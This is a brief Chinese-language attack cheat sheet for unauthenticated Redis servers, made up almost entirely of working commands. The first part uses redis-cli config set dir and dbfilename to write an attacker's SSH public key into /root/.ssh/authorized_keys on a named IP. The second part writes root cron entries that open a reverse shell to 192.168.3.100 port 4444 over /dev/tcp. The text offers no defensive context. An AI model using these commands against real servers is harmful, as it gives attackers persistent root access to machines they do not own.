Redis

• Redis未授权写密钥

ssk-keygen
cat .ssh/id_rsa.pub

redis-cli -h 173.239.46.188 -a password
指定目录
config set dir /root/.ssh
指定文件名
config set dbfilename authorized_keys
设置公钥内容
set x "\n\n\n id_rsa.pub \n\n\n"
保存
save

• Redis未授权写反弹shell

set x "\n* * * * * exec /bin/sh 0</dev/tcp/192.168.3.100/4444 1>&0 2>&0\n"
set x "\n* * * * * bash -i >& /dev/tcp/192.168.3.100/4444 0>&1\n"
config set dir /var/spool/cron
config set dbfilename root
save